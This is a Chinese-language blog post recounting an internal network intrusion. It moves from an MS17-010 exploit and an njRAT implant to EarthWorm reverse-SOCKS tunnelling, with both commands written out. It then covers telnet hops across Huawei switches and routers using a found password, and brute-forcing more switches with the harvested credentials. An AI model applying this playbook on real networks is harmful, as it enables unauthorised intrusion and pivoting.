Loading


目录
复盘从一个监控主机到核心路由沦陷

在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波

kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机

1570723715159

尝试打了一波

1570723899385

然后种了个njrat

1570725845893

翻文件的时候发现了点配置文件

1570724083033

down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法

1570724161870

查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL

1570724333653

于是在被控机上搭了earthworm做转发

本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口

被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口

1570724558982

然后开启proxifier的代理功能,成功访问了那个系统,但这不是主要目的

1570724652145

在咨询了好哥们后,他建议尝试搞搞交换机看看

在对10.2.66/24网段扫描后发现10.2.66.254开放了8023端口,尝试xshell连接

1570724812791

成功使用huawei密码[email protected]连接,继续翻上级路由

1570724864331

1570724926806

发现了10.2.20.1

继续telnet

1570724968457

继续翻

1570725016714

发现10.2.20.58

1570725071124

继续翻,翻到10.4.0.1

1570725139216

继续telnet

1570725188260

另外发现此时可以ping通10.4.0.1这台交换机

1570725560354

于是乎,扔浏览器打开看看

1570725700017

1570725725357

拿下后将本次收集到的密码与巡风扫描到的telnet主机进行爆破后发现了更多的交换机。。。。。。

1570725809593

文章作者: Sp4ce
文章链接: https://0x20h.com/p/aac0.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sp4ce's Blog

评论